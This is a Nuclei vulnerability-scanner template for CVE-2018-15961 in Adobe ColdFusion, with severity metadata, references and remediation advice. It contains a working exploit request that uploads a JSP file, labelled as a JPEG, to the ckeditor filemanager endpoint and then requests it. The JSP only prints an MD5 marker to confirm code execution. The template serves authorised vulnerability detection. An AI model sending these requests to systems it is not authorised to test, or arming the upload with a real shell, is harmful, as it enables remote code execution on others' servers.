nuclei-templates/http/cves/2018/CVE-2018-15961.yaml

79 lines
3.1 KiB
YAML

id: CVE-2018-15961
info:
name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
author: SkyLark-Lab,ImNightmaree
severity: critical
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
impact: |
Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system.
remediation: |
Apply the necessary security patches or updates provided by Adobe to fix this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15961
- https://github.com/xbufu/CVE-2018-15961
- https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html
- http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621
- http://www.securitytracker.com/id/1041621
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-15961
cwe-id: CWE-434
epss-score: 0.97447
epss-percentile: 0.99944
cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
http:
- raw:
- |
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-15961";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
{{randstr}}.jsp
-----------------------------24464570528145--
- |
GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961
- type: status
status:
- 200
# digest: 4a0a0047304502202ea3883204a4effb1a5a6528cb554f7cbac69a7b5e7a10098686e742f128cfc8022100f88820e3ea537d64a035cfa822a942de6c1bbc332b57bd38d2e45129a1e03990:922c64590222798bb761d5b6d8e72950